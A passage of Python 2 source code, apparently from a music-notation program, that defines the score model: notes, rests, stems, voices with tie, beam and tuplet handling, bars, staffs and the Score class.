steps):\n return 7-self.clefdata[self.m_name][self.POS] - steps + self.m_octaviation\n def an_to_ylinepos(self, an):\n def notename_to_ylinepos(n):\n n = MusicalPitch.new_from_notename(n)\n return self.steps_to_ylinepos(n.steps())\n if an[-2:] == 'es':\n l = 3\n h = -3\n else:\n l = 1\n h = -5\n i = notename_to_ylinepos(an)\n while i > l:\n an = an + \"'\"\n i = notename_to_ylinepos(an)\n while i < h:\n an = an + \",\"\n i = notename_to_ylinepos(an)\n return i\n\nclass TimeSignature(object):\n \"\"\"\n A TimeSignature is not the same as a Rat, because a Rat 4/4 can be\n simplified to 1/1, but time signatures should not. Also a time signature\n will probably know about preferred beaming. 
4/4 vs 6/8 for example.\n \"\"\"\n __hash__ = None\n def __init__(self, a, b):\n self.m_num = a\n self.m_den = b\n def as_rat(self):\n return Rat(self.m_num, self.m_den)\n def __eq__(self, other):\n return self.m_num == other.m_num and self.m_den == other.m_den\n def __ne__(self, other):\n return not self.__eq__(other)\n def __repr__(self):\n return \"\" % (self.m_num, self.m_den)\n\nclass HasParent(object):\n def __init__(self, parent):\n self.set_parent(parent)\n def set_parent(self, parent):\n if parent:\n self.w_parent = weakref.ref(parent)\n w = self.w_parent\n # FIXME loop instead of ifelse, since the hierarcy might\n # get deeper.\n # FIXME should we allow for the try: clause??\n try:\n if isinstance(w(), Score):\n self.w_score = w\n elif type(w().w_parent()) == Score:\n self.w_score = w().w_parent\n else:\n assert isinstance(w().w_parent().w_parent(), Score)\n self.w_score = w().w_parent().w_parent\n except AttributeError:\n pass\n\n\nclass MusicElement(object):\n def __init__(self, duration):\n assert isinstance(duration, Duration)\n self.m_duration = duration\n def __repr__(self):\n return unicode(self.__class__)[:-2].replace(\"\" % (self.m_duration.as_mpd_string(), hex(id(self)))\n\nclass Note(MusicElement):\n __hash__ = None\n class Exception(Exception):\n pass\n def __deepcopy__(self, memo):\n n = Note(self.m_musicalpitch.clone(), self.m_duration.clone())\n n.m_tieinfo = self.m_tieinfo\n return n\n def __eq__(self, other):\n assert isinstance(other, Note)\n return (self.m_musicalpitch == other.m_musicalpitch and\n self.m_duration == other.m_duration)\n def __init__(self, musicalpitch, duration):\n MusicElement.__init__(self, duration)\n assert isinstance(musicalpitch, MusicalPitch)\n self.m_musicalpitch = musicalpitch\n self.m_tieinfo = None\n @staticmethod\n def new_from_string(string):\n s = string.strip()\n m = re_melodic.match(s)\n if m.end() < len(s) - 1:\n # FIXME: raise ValueError like rest\n raise Note.Exception(\"characters left in string\", string)\n return Note(\n MusicalPitch.new_from_notename(\"%s%s\" % (m.group('notename'),\n m.group('octave'))),\n Duration.new_from_string(\"%s%s\" % (m.group('len'), m.group('dots')))\n )\n def __repr__(self):\n return unicode(self.__class__)[:-2].replace(\"\" % (self.m_musicalpitch.get_octave_notename(), self.m_duration.as_mpd_string(), hex(id(self)))\n\nclass Rest(MusicElement):\n def __init__(self, duration):\n MusicElement.__init__(self, duration)\n def __deepcopy__(self, memo):\n return Rest(self.m_duration.clone())\n @staticmethod\n def new_from_string(string):\n return Rest(Duration.new_from_string(string))\n\nclass Skip(MusicElement):\n def __init__(self, duration):\n MusicElement.__init__(self, duration)\n def __deepcopy__(self, memo):\n return Skip(self.m_duration.clone())\n @staticmethod\n def new_from_string(string):\n return Skip(Duration.new_from_string(string))\n\nclass Stem(list):\n \"\"\"\n Every note belongs to a stem, even whole-notes.\n \"\"\"\n class NotEqualLengthException(Exception):\n \"\"\"\n Every notehead on a stem must have the same duration.\n \"\"\"\n pass\n def __init__(self, parent, elemlist, stemdir):\n assert isinstance(elemlist, list)\n assert stemdir in (const.UP, const.DOWN, const.BOTH)\n if [x for x in elemlist if x.m_duration != elemlist[0].m_duration]:\n raise self.NotEqualLengthException()\n list.__init__(self, elemlist)\n self.w_parent = weakref.ref(parent)\n for note in self:\n note.w_parent = weakref.ref(self)\n self.m_stemdir = stemdir\n self.m_beaminfo = None\n self.m_tupletinfo = 
None\n def __repr__(self):\n return \"\" % (str(list(self)), self.m_stemdir)\n\n\nclass Voice(HasParent):\n class CannotAddException(Exception):\n pass\n class NoChordsInRhythmStaffException(Exception):\n pass\n class NotUnisonException(Exception):\n pass\n class BarFullException(Exception):\n \"\"\"\n Exception raised if we try to add a note or rest that is longer than\n the available time in the bar. FIXME: maybe name better, like\n NotEnoughtTimeException or similar.\n \"\"\"\n def __unicode__(self):\n return u\"There is not enough space left in the bar\"\n class NoteDontBelongHere(Exception):\n \"\"\"\n raised if we try to beam notes that does not belong to this voice.\n \"\"\"\n pass\n def __init__(self, parent):\n HasParent.__init__(self, parent)\n # The timelen of the Voice\n self.m_length = Rat(0, 1)\n self.m_tdict = {}\n def copy(self, parent):\n \"\"\"\n Return a copy of this Voice object. We make a copy of the dict and\n the m_length variable, but the dict revers to the same object.\n \"\"\"\n ret = Voice(parent)\n ret.m_length = Rat(self.m_length.m_num, self.m_length.m_den)\n ret.m_tdict = self.m_tdict.copy()\n return ret\n def append(self, elem, stemdir=const.BOTH):\n \"\"\"\n elem - either a MusicElement or a list of MusicElements\n\n Rests or Skips cannot be put in a list.\n\n If elem is a list of MusicElements (that is notes...), then all\n the notes will belong to the same stem when typeset.\n\n Create a new bar if the current bar is full.\n Raise Voice.BarFullException if the last bar is not full, but there\n is not enought room for the element in the bar.\n\n Also call parent so that the whole hierarcy knows about this timepos.\n \"\"\"\n # Verify that if elem is a list, then there should be only Notes in it.\n if isinstance(elem, list):\n if [e for e in elem if not isinstance(e, Note)]:\n raise self.CannotAddException(elem)\n else:\n # Anyway, we want it to be a list, even at len 1 for simplicity\n elem = [elem]\n if isinstance(self.w_parent(), RhythmStaff) and len(elem) > 1:\n raise Voice.NoChordsInRhythmStaffException()\n try:\n bar = self.w_score().get_bar_at(self.m_length)\n except IndexError:\n # IndexError means that self.m_length is after the last bar, this means\n # that the current bar is full.\n bar = self.w_score().add_bar(None)\n if (self.m_length + elem[0].m_duration.get_rat_value() <= bar.end()):\n if isinstance(elem[0], Note):\n # We don't have to set w_parent for the Stem and the notes\n # here, because the Stem constructor does it.\n self.set_elem(Stem(self, elem, stemdir), self.m_length)\n else: # rest or skip\n self.set_elem(elem, self.m_length)\n elem[0].w_parent = weakref.ref(self)\n self.m_length += elem[0].m_duration.get_rat_value()\n else:\n raise self.BarFullException()\n def add_to(self, timepos, note):\n \"\"\"\n Add note to an existing stem at timepos.\n \"\"\"\n assert timepos in self.m_tdict\n assert self.m_tdict[timepos]['elem'][0].m_duration == note.m_duration\n note.w_parent = weakref.ref(self.m_tdict[timepos]['elem'])\n assert isinstance(note.w_parent(), Stem)\n self.m_tdict[timepos]['elem'].append(note)\n def set_elem(self, elem, timepos):\n \"\"\"\n Elem is a one item list containing a Skip or Rest, or Stem (that\n is indeed a list too) containing Notes.\n \"\"\"\n assert isinstance(elem, list)\n if timepos not in self.m_tdict:\n self.m_tdict[timepos] = {}\n self.m_tdict[timepos]['elem'] = elem\n def del_elem(self, timepos):\n \"\"\"\n Delete the element at timepos, move the remaining notes\n in the bar to the left to fill the gap.\n 
\"\"\"\n assert timepos in self.m_tdict\n bp = BarProxy(self, timepos)\n tp = self.get_timeposes_of(bp.m_bar)[-1]\n # If the last note in the bar is tied to the next bar, then\n # we must untie it.\n if (isinstance(self.m_tdict[tp]['elem'][0], Note)\n and self.m_tdict[tp]['elem'][0].m_tieinfo in ('go', 'start')):\n self.untie_next(tp)\n if isinstance(self.m_tdict[timepos]['elem'][0], Note):\n if self.is_last(timepos):\n self.untie_next(timepos)\n if self.m_tdict[timepos]['elem'][0].m_tieinfo == 'go':\n self.tie_prev_to_next(timepos)\n elif self.m_tdict[timepos]['elem'][0].m_tieinfo == 'end':\n self.untie_prev(timepos)\n elif self.m_tdict[timepos]['elem'][0].m_tieinfo == 'start':\n self.untie_next(timepos)\n del self.m_tdict[timepos]\n bp.remove_skips()\n bp.repack()\n bp.fill_skips()\n def try_set_elem(self, elem, timepos, insert_mode):\n \"\"\"\n Replace whatever is at timepos with elem.\n Return True if succuessful.\n \"\"\"\n bp = BarProxy(self, timepos)\n if isinstance(self.m_tdict[timepos]['elem'][0], Skip):\n if timepos + elem.m_duration.get_rat_value() <= bp.end():\n if isinstance(elem, Note):\n stem = Stem(self, [elem], const.UP)\n self.set_elem(stem, timepos)\n else:\n self.set_elem([elem], timepos)\n elem.w_parent = weakref.ref(self)\n bp.remove_skips()\n bp.repack()\n bp.fill_skips()\n return True\n else:\n max_free = bp.get_free_time()\n #flytt til bar-class\n delta = elem.m_duration.get_rat_value() - self.m_tdict[timepos]['elem'][0].m_duration.get_rat_value()\n def fix_ties(prev_timepos, cur_timepos, next_timepos):\n prev_e = self.m_tdict[prev_timepos]['elem'][0] if prev_timepos else None\n cur_e = self.m_tdict[cur_timepos]['elem'][0]\n next_e = self.m_tdict[next_timepos]['elem'][0] if next_timepos else None\n if isinstance(elem, Note):\n t = None\n if prev_timepos and isinstance(prev_e, Note) and prev_e.m_tieinfo in ('go', 'start'):\n t = 'end'\n if isinstance(next_e, Note) and next_e.m_tieinfo in ('go', 'end'):\n if t == 'end':\n t = 'go'\n else:\n t = 'start'\n cur_e.m_tieinfo = t\n else:\n assert isinstance(elem, Rest)\n if prev_timepos and isinstance(prev_e, Note):\n if prev_e.m_tieinfo == 'go':\n prev_e.m_tieinfo = 'end'\n elif prev_e.m_tieinfo == 'start':\n prev_e.m_tieinfo = None\n if isinstance(next_e, Note):\n if next_e.m_tieinfo == 'go':\n next_e.m_tieinfo = 'start'\n elif next_e.m_tieinfo == 'end':\n next_e.m_tieinfo = None\n\n if insert_mode:\n if max_free >= elem.m_duration.get_rat_value():\n tmp_timepos = timepos + Rat(1, 1000000)\n self.m_tdict[tmp_timepos] = self.m_tdict[timepos]\n del self.m_tdict[timepos]\n bp.remove_trailing(elem.m_duration.get_rat_value())\n stem = Stem(self, [elem], const.UP)\n self.set_elem(stem, timepos)\n fix_ties(self.get_prev_timepos(timepos), timepos, tmp_timepos)\n bp.remove_skips()\n bp.repack()\n bp.fill_skips()\n return True\n if not insert_mode:\n if (max_free >= delta):\n # We have space to add.\n # Delete skips (and rests) from the end of the bar\n # until we have enough space to add the elem.\n if delta > Rat(0, 1):\n bp.remove_trailing(delta)\n stem = Stem(self, [elem], const.UP)\n self.set_elem(stem, timepos)\n fix_ties(self.get_prev_timepos(timepos), timepos, self.get_next_timepos(timepos))\n bp.remove_skips()\n bp.repack()\n bp.fill_skips()\n return True\n def fill_with_skips(self):\n \"\"\"\n Fill the voice with skips. 
We assume the voice is empty.\n \"\"\"\n for bar in self.w_score().m_bars:\n bar.fill_skips(self)\n def get_timeposes_of(self, bar):\n \"\"\"\n Return a sorted list of all timeposes in bar in this Voice\n \"\"\"\n v = sorted(self.m_tdict.keys())\n try:\n # this is the fastest way to set start_i\n start_i = v.index(bar.m_timepos)\n except ValueError:\n # but if code has recently removed the timepos, then we have to\n # search for it.\n start_i = 0\n while start_i < len(v) and v[start_i] < bar.m_timepos:\n start_i += 1\n if start_i >= len(v) or v[start_i] >= bar.end():\n start_i = None\n try:\n end_i = v.index(bar.end())\n except ValueError:\n end_i = None\n if start_i == None:\n return []\n elif end_i:\n return v[start_i:end_i]\n else:\n return v[start_i:]\n def get_time_pitch_list(self, bpm):\n \"\"\"\n Return a list of tuples (pitch, duration-in-seconds) of the tones\n and rests in the voice. -1 is used for pitch for rests.\n \"\"\"\n ret = []\n for timepos in sorted(self.m_tdict.keys()):\n # stem is a Stem or [Rest]\n stem = self.m_tdict[timepos]['elem']\n if len(stem) != 1:\n raise Voice.NotUnisonException()\n dur = float(stem[0].m_duration.get_rat_value()) * bpm[1] / bpm[0] * 60\n if isinstance(stem[0], Note):\n ret.append((stem[0].m_musicalpitch.semitone_pitch(), dur))\n elif isinstance(stem[0], Rest):\n ret.append((-1, dur))\n return ret\n def beam(self, notes):\n \"\"\"\n Notes is a list of Note objects, once Note object from each stem\n you want to beam.\n The notes should be in sequence on this Voice. Behaviour if not\n sequential is undefined.\n \"\"\"\n for note in notes:\n try:\n if note.w_parent().w_parent() != self:\n raise self.NoteDontBelongHere()\n except AttributeError:\n raise self.NoteDontBelongHere()\n notes[0].w_parent().m_beaminfo = 'start'\n for n in notes[1:][:-1]:\n n.w_parent().m_beaminfo = 'go'\n notes[-1].w_parent().m_beaminfo = 'end'\n def tie_timepos(self, timepos):\n \"\"\"\n Tie all notes on this timepos that has the same pitch as notes on the\n next timepos. Return True if tie(s) could be added.\n FIXME: The current version of this method only works as expected\n when there is only one notehead on each stem. 
This because it was\n implemented to create the rhythmwidget.\n \"\"\"\n next_timepos = self.get_next_timepos(timepos)\n # if we are last in the score\n if not next_timepos:\n return\n if not isinstance(self.m_tdict[next_timepos]['elem'][0], Note):\n return\n # Assert there is only one notehead on each stem.\n assert len(self.m_tdict[timepos]['elem']) == 1\n assert len(self.m_tdict[next_timepos]['elem']) == 1\n if self.m_tdict[timepos]['elem'][0].m_musicalpitch == self.m_tdict[next_timepos]['elem'][0].m_musicalpitch:\n self.tie([self.m_tdict[timepos]['elem'][0],\n self.m_tdict[next_timepos]['elem'][0]])\n return True\n def untie_next(self, timepos):\n \"\"\"\n Return True if we removed the tie from timepos to the note after.\n Return False if not.\n \"\"\"\n next_timepos = self.get_next_timepos(timepos)\n if self.m_tdict[timepos]['elem'][0].m_tieinfo == 'start':\n if self.m_tdict[next_timepos]['elem'][0].m_tieinfo == 'end':\n self.m_tdict[next_timepos]['elem'][0].m_tieinfo = None\n elif self.m_tdict[next_timepos]['elem'][0].m_tieinfo == 'go':\n self.m_tdict[next_timepos]['elem'][0].m_tieinfo = 'start'\n else:\n return False\n self.m_tdict[timepos]['elem'][0].m_tieinfo = None\n elif self.m_tdict[timepos]['elem'][0].m_tieinfo == 'go':\n if self.m_tdict[next_timepos]['elem'][0].m_tieinfo == 'end':\n self.m_tdict[next_timepos]['elem'][0].m_tieinfo = None\n elif self.m_tdict[next_timepos]['elem'][0].m_tieinfo == 'go':\n self.m_tdict[next_timepos]['elem'][0].m_tieinfo = 'start'\n else:\n return False\n self.m_tdict[timepos]['elem'][0].m_tieinfo = 'end'\n else:\n return False\n return True\n def untie_prev(self, timepos):\n \"\"\"\n Remove True if we removed a tie from the prev note to this.\n Return False if not.\n \"\"\"\n prev_timepos = self.get_prev_timepos(timepos)\n if self.m_tdict[timepos]['elem'][0].m_tieinfo == 'end':\n if self.m_tdict[prev_timepos]['elem'][0].m_tieinfo == 'start':\n self.m_tdict[prev_timepos]['elem'][0].m_tieinfo = None\n elif self.m_tdict[prev_timepos]['elem'][0].m_tieinfo == 'go':\n self.m_tdict[prev_timepos]['elem'][0].m_tieinfo = 'end'\n else:\n return False\n self.m_tdict[timepos]['elem'][0].m_tieinfo = None\n elif self.m_tdict[timepos]['elem'][0].m_tieinfo == 'go':\n if self.m_tdict[prev_timepos]['elem'][0].m_tieinfo == 'start':\n self.m_tdict[prev_timepos]['elem'][0].m_tieinfo = None\n elif self.m_tdict[prev_timepos]['elem'][0].m_tieinfo == 'go':\n self.m_tdict[prev_timepos]['elem'][0].m_tieinfo = 'end'\n else:\n return False\n self.m_tdict[timepos]['elem'][0].m_tieinfo = 'start'\n def tie_prev_to_next(self, timepos):\n assert self.m_tdict[timepos]['elem'][0].m_tieinfo == 'go'\n assert self.m_tdict[self.get_prev_timepos(timepos)]['elem'][0].m_tieinfo in ('start', 'go')\n assert self.m_tdict[self.get_next_timepos(timepos)]['elem'][0].m_tieinfo in ('end', 'go')\n self.m_tdict[timepos]['elem'][0].m_tieinfo = None\n def tie(self, notes):\n \"\"\"\n The notes should be in sequence on this Voice. 
Behaviour if not\n sequential is undefined.\n \"\"\"\n for note in notes:\n # FIXME common with beam\n try:\n if note.w_parent().w_parent() != self:\n raise self.NoteDontBelongHere()\n except AttributeError:\n raise self.NoteDontBelongHere()\n if notes[0].m_tieinfo == 'end':\n notes[0].m_tieinfo = 'go'\n elif notes[0].m_tieinfo is None:\n notes[0].m_tieinfo = 'start'\n for n in notes[1:][:-1]:\n n.m_tieinfo = 'go'\n # This conditional is true when notes 2 and 3 are tied, and the\n # editor ties note 1 and note 2.\n if notes[-1].m_tieinfo == 'start':\n notes[-1].m_tieinfo = 'go'\n elif notes[-1].m_tieinfo is None:\n notes[-1].m_tieinfo = 'end'\n def tuplet(self, ratio, direction, notes):\n \"\"\"\n ratio - a Rat, for example Rat(2, 3) for normal triplets.\n direction - const.UP, const.DOWN or const.BOTH\n notes - a list of Note objects, once Note object from each stem\n you want to have a visible tuplet engraver.\n The notes should be in sequence on this Voice. Behaviour if not\n sequential is undefined.\n \"\"\"\n for note in notes:\n # FIXME common with beam\n try:\n if note.w_parent().w_parent() != self:\n raise self.NoteDontBelongHere()\n except AttributeError:\n raise self.NoteDontBelongHere()\n if notes[0].w_parent().m_tupletinfo == 'end':\n notes[0].w_parent().m_tupletinfo = 'go'\n else:\n notes[0].w_parent().m_tupletinfo = 'start'\n notes[0].w_parent().m_tuplet_dir = direction\n notes[0].w_parent().m_tuplet_ratio = ratio\n for n in notes[1:][:-1]:\n n.w_parent().m_tupletinfo = 'go'\n notes[-1].w_parent().m_tupletinfo = 'end'\n def set_clef(self, clef):\n \"\"\"\n Set the clef that will be inserted into the staff before the next\n music element.\n \"\"\"\n self.w_parent().set_clef(clef, self.m_length)\n def set_key_signature(self, keysig):\n \"\"\"\n Call the Staff and set the key signature at the timepos the next\n tone will be added to this voice.\n \"\"\"\n self.w_parent().set_key_signature(keysig, self.m_length)\n def is_bar_full(self):\n \"\"\"\n Return True if this the next tone will be placed on the first beat\n of a bar. This means that there are either nothing in the voice at\n all, or the current bar is full.\n \"\"\"\n try:\n bar = self.w_score().get_bar_at(self.m_length)\n return bar.m_timepos == self.m_length\n except IndexError:\n return True\n def get_prev_timepos(self, timepos):\n \"\"\"\n Return the previous timepos. Return None if this is the first\n timepos in the voice.\n \"\"\"\n assert timepos in self.m_tdict\n v = sorted(self.m_tdict.keys())\n i = v.index(timepos)\n if i > 0:\n return v[i - 1]\n def get_next_timepos(self, timepos):\n \"\"\"\n Return the next timepos. 
Return None if this is the last timepos\n in the Voice.\n \"\"\"\n assert timepos in self.m_tdict\n v = sorted(self.m_tdict.keys())\n i = v.index(timepos)\n if i +1 < len(v):\n return v[i + 1]\n def get_timelist(self):\n retval = []\n for timepos in sorted(self.m_tdict.keys()):\n if isinstance(self.m_tdict[timepos]['elem'][0], Rest):\n if retval[-1][0] == False:\n retval[-1][1] += self.m_tdict[timepos]['elem'][0].m_duration.get_rat_value()\n else:\n retval.append([False, self.m_tdict[timepos]['elem'][0].m_duration.get_rat_value()])\n elif self.m_tdict[timepos]['elem'][0].m_tieinfo == 'start':\n nlen = self.m_tdict[timepos]['elem'][0].m_duration.get_rat_value()\n elif self.m_tdict[timepos]['elem'][0].m_tieinfo == 'continue':\n nlen += self.m_tdict[timepos]['elem'][0].m_duration.get_rat_value()\n else:\n if self.m_tdict[timepos]['elem'][0].m_tieinfo == 'end':\n nlen += self.m_tdict[timepos]['elem'][0].m_duration.get_rat_value()\n else:\n nlen = self.m_tdict[timepos]['elem'][0].m_duration.get_rat_value()\n retval.append([isinstance(self.m_tdict[timepos]['elem'][0], Note),\n nlen])\n nlen = None\n return retval\n def is_last(self, timepos):\n \"\"\"\n Return a bool telling if the elem at timepos is the last in the\n bar and fill it, so that the next elem has to be the first in the\n next bar.\n \"\"\"\n return self.m_tdict[timepos]['elem'][0].m_duration.get_rat_value() + timepos == self.w_score().get_bar_at(timepos).end()\n def __getitem__(self, idx):\n v = sorted(self.m_tdict)\n return self.m_tdict[v[idx]]\n\nclass Bar(object):\n def __init__(self, timesig, timepos):\n \"\"\"\n Time signature is the time signature of the bar. It does not\n necessarily mean that we will engrave a time signature on the\n score. All bar objects need to know their length.\n\n timepos is the time of the first music in the bar. 
So timepos\n + timesig will be the position of the next bar.\n \"\"\"\n assert isinstance(timesig, TimeSignature)\n assert isinstance(timepos, Rat)\n self.m_timesig = timesig\n self.m_timepos = timepos\n def end(self):\n return self.m_timepos + self.m_timesig.as_rat()\n def fill_skips(self, voice):\n \"\"\"\n Add Skips at the end of the bar, so that it is filled.\n We assume that any elements already added are placed at\n the correct timepos.\n \"\"\"\n # nt = short for \"next timepos\", the timepos to start fill skips to\n if voice.get_timeposes_of(self):\n nt = voice.get_timeposes_of(self)[-1]\n nt = nt + voice.m_tdict[nt]['elem'][0].m_duration.get_rat_value()\n else:\n # we get here if the bar is empty\n nt = self.m_timepos\n default_skip = Rat(1, 4)\n # pos within default skip\n pp = nt - int (nt / default_skip) * default_skip\n if pp != Rat(0, 1):\n # Here we add a skip so that the next column will be X times\n # default_skip\n voice.set_elem([Skip(Duration.new_from_rat(default_skip - pp))],\n nt)\n nt += (default_skip - pp)\n # And the we fill the bar with Skips as long as default_skip.\n while nt < self.end():\n voice.set_elem([Skip(Duration.new_from_rat(default_skip))], nt)\n nt += default_skip\n def get_free_time(self, voice):\n \"\"\"\n Return the duration, as a Rat value, on the end of the bar\n consisting of Rests and Skips.\n \"\"\"\n d = Rat(0, 1)\n for timepos in reversed(voice.get_timeposes_of(self)):\n if not isinstance(voice.m_tdict[timepos]['elem'][0], (Skip, Rest)):\n break\n d += voice.m_tdict[timepos]['elem'][0].m_duration.get_rat_value()\n return d\n def pop_last_elem(self, voice):\n \"\"\"\n Remove the last element form the voice, and return its\n duration as a Rat.\n \"\"\"\n timepos = voice.get_timeposes_of(self)[-1]\n ret = voice.m_tdict[timepos]['elem'][0].m_duration.get_rat_value()\n del voice.m_tdict[timepos]\n return ret\n def remove_skips(self, voice):\n \"\"\"\n Remove the skips from the bar, if any.\n Leave bar in inconsistent state. Need bar.repack or similar after\n calling this method.\n \"\"\"\n for t in voice.get_timeposes_of(self):\n if isinstance(voice.m_tdict[t]['elem'][0], Skip):\n del voice.m_tdict[t]\n def remove_trailing(self, voice, duration):\n \"\"\"\n Remove elements from the end of the bar, until their duration\n is a least 'duration' long.\n \"\"\"\n assert isinstance(duration, Rat)\n total = Rat(0, 1)\n while total < duration:\n total += self.pop_last_elem(voice)\n def repack(self, voice):\n \"\"\"\n Call this method to cleanup m_tdict for the bar after keys\n from m_tict have ben deleted. Example before bar.repack:\n 0/4: Note\n 1/4: Rest\n 1/2: Note\n\n then del m_tdict[Rat(1, 4)] make the content of tdict look like this:\n 0/4: Note\n 1/2: Note\n\n Calling bar.repack will repack is like this:\n 0/4: Note\n 1/4: Note\n\n NOTE: This method does not add or remove any elements, including Skips\n \"\"\"\n timeposes = voice.get_timeposes_of(self)\n if timeposes:\n last_is_last = voice.is_last(timeposes[-1])\n else:\n last_is_last = None\n corrected_timepos = self.m_timepos\n mods = {}\n for t in voice.get_timeposes_of(self):\n if t != corrected_timepos:\n mods[corrected_timepos] = t\n corrected_timepos += voice.m_tdict[t]['elem'][0].m_duration.get_rat_value()\n if corrected_timepos > self.end():\n raise voice.BarFullException()\n if mods:\n # This conditional is true if the elem we are replacing is shorter\n # than the new one. 
We must select the correct order to adjust the\n # timeposes so we don't overwrite values\n if mods.items()[0][0] < mods.items()[0][1]:\n keys = sorted(mods.keys())\n else:\n keys = reversed(sorted(mods.keys()))\n for n in keys:\n assert n not in voice.m_tdict\n voice.m_tdict[n] = voice.m_tdict[mods[n]]\n del voice.m_tdict[mods[n]]\n # If the last note is not filling the bar any more, then we must\n # remove the tie.\n if last_is_last:\n timeposes = voice.get_timeposes_of(self)\n if (timeposes and not voice.is_last(timeposes[-1])\n and isinstance(voice.m_tdict[timeposes[-1]]['elem'][0], Note)\n and voice.m_tdict[timeposes[-1]]['elem'][0].m_tieinfo in ('go', 'start')):\n voice.untie_next(timeposes[-1])\n def __repr__(self):\n return \"<%s %i/%i %s at %s>\" % (str(self.__class__).split(\".\")[-1][:-2], self.m_timesig.m_num,\n self.m_timesig.m_den, self.m_timepos, hex(id(self)))\n\nclass PartialBar(Bar):\n def __init__(self, duration, timesig, timepos):\n Bar.__init__(self, timesig, timepos)\n assert isinstance(duration, Duration)\n self.m_duration = duration\n def end(self):\n return self.m_timepos + self.m_duration.get_rat_value()\n\nclass BarProxy(object):\n def __init__(self, voice, timepos):\n self.m_voice = voice\n self.m_bar = voice.w_parent().w_parent().get_bar_at(timepos)\n def __getattr__(self, attr):\n if attr == 'end':\n return self.m_bar.end\n return lambda *f: getattr(self.m_bar, attr)(self.m_voice, *f)\n\nclass _StaffCommon(HasParent):\n \"\"\"\n A voice is added to the staff when it is created.\n \"\"\"\n def __init__(self, parent):\n assert isinstance(parent, Score)\n HasParent.__init__(self, parent)\n self.m_voices = []\n self.add_voice()\n # I think the only things stored in Staff.m_tdict are \"clef\" and\n # \"keysig\". We don't store time signature changes where, since\n # Score.m_bars take care about that.\n self.m_tdict = {}\n def copy(self, parent):\n staff = self.__class__(parent)\n staff.m_voices = [v.copy(staff) for v in self.m_voices]\n staff.m_tdict = self.m_tdict.copy()\n return staff\n def add_voice(self):\n self.m_voices.append(Voice(self))\n self.w_score().create_shortcuts()\n return self.m_voices[-1]\n def get_timeposes(self):\n \"\"\"\n Return a sorted list of all timeposes in the staff.\n We generate the list by checking all timeposes added to the\n staff because of Clefs and TimeSignatures, and then all timeposes\n in the voices.\n \"\"\"\n timeposes = set()\n for has_timeposes in self.m_voices + [self]:\n [timeposes.add(t) for t in has_timeposes.m_tdict]\n return sorted(timeposes)\n def get_timelist(self):\n data = {}\n for voice_idx, voice in enumerate(self.m_voices):\n for timepos in voice.m_tdict:\n n = voice.m_tdict[timepos]['elem'][0]\n if isinstance(n, Note):\n if timepos not in data:\n data[timepos] = {'start': set(), 'end': set()}\n data[timepos]['start'].add(voice_idx)\n endpos = timepos + n.m_duration.get_rat_value()\n if endpos not in data:\n data[endpos] = {'start': set(), 'end': set()}\n data[endpos]['end'].add(voice_idx)\n retval = []\n v = sorted(data)[:]\n ppos = Rat(0, 1)\n voices = set()\n for timepos in v:\n if data[timepos]['start'] and data[timepos]['end']:\n for voice in data[timepos]['end']:\n voices.remove(voice)\n for voice in data[timepos]['start']:\n voices.add(voice)\n assert voices\n retval.append([True, timepos - ppos])\n ppos = timepos\n elif data[timepos]['start']:\n if not voices:\n ppos = timepos\n else:\n retval.append([True, timepos - ppos])\n ppos = timepos\n for voice in data[timepos]['start']:\n voices.add(voice)\n 
elif data[timepos]['end']:\n for voice in data[timepos]['end']:\n voices.remove(voice)\n if not voices:\n retval.append([True, timepos - ppos])\n return retval\n def set_property(self, timepos, name, value):\n d = self.m_tdict.setdefault(timepos, {})\n properties = d.setdefault('properties', {})\n properties[name] = value\n\nclass Staff(_StaffCommon):\n def __init__(self, parent):\n _StaffCommon.__init__(self, parent)\n self.set_clef(\"violin\", Rat(0, 1))\n def set_clef(self, clef, timepos):\n if timepos not in self.m_tdict:\n self.m_tdict[timepos] = {}\n self.m_tdict[timepos]['clef'] = Clef(clef)\n def set_key_signature(self, keysig, timepos):\n if timepos not in self.m_tdict:\n self.m_tdict[timepos] = {}\n self.m_tdict[timepos]['keysig'] = keysig\n\n\nclass RhythmStaff(_StaffCommon):\n \"\"\"\n We don't implement set_clef since there should be no clefs on a\n rhythm staff.\n \"\"\"\n class OnlyOneVoiceException(Exception):\n pass\n def __init__(self, parent):\n _StaffCommon.__init__(self, parent)\n def add_voice(self):\n if len(self.m_voices) == 1:\n raise self.OnlyOneVoiceException()\n _StaffCommon.add_voice(self)\n def set_key_signature(self, keysig, timepos):\n \"\"\"\n RhythmStaffs don't have key signatures.\n \"\"\"\n return\n\n\nclass Score(object):\n class ConcatException(Exception):\n pass\n class StaffCountException(ConcatException):\n pass\n class StaffTypeException(ConcatException):\n pass\n class VoiceCountException(ConcatException):\n pass\n def __init__(self):\n self.m_staffs = []\n self.m_bars = []\n def copy(self):\n score = Score()\n score.m_staffs = [s.copy(score) for s in self.m_staffs]\n score.m_bars = copy.deepcopy(self.m_bars)\n return score\n def add_staff(self, staff_class=Staff):\n self.m_staffs.append(staff_class(self))\n self.create_shortcuts()\n return self.m_staffs[-1]\n def create_shortcuts(self):\n \"\"\"\n (Re)create the voice and staff shortcuts.\n \"\"\"\n # shortcut that is nice to people using the API directly.\n for staff_idx, staff in enumerate(self.m_staffs):\n setattr(self, \"staff%i\" % (staff_idx + 1), staff)\n for voice_idx, voice in enumerate(staff.m_voices):\n setattr(self, \"voice%i%i\" % (staff_idx + 1, voice_idx + 1), voice)\n def _get_new_bar_timepos(self):\n \"\"\"\n Return the timepos where the next bar will be added.\n \"\"\"\n if self.m_bars:\n return self.m_bars[-1].end()\n return Rat(0, 1)\n def _get_new_bar_timesig(self, timesig):\n \"\"\"\n Return the time signature the next bar will get.\n \"\"\"\n if timesig:\n return timesig\n elif self.m_bars:\n return self.m_bars[-1].m_timesig\n else:\n return TimeSignature(4, 4)\n def add_bar(self, timesig):\n \"\"\"\n If timesig is None, then we use the same timesig as the last bar.\n Return the added bar.\n \"\"\"\n self.m_bars.append(Bar(\n self._get_new_bar_timesig(timesig), self._get_new_bar_timepos()))\n return self.m_bars[-1]\n def add_partial_bar(self, duration, timesig):\n \"\"\"\n Set to the duration of the pickup bar if we want one.\n This must be called before bars are added with Score.add_bar\n \"\"\"\n self.m_bars.append(PartialBar(duration,\n self._get_new_bar_timesig(timesig), self._get_new_bar_timepos()))\n return self.m_bars[-1]\n def get_bar_at(self, timepos):\n \"\"\"\n Return the bar timepos is within. 
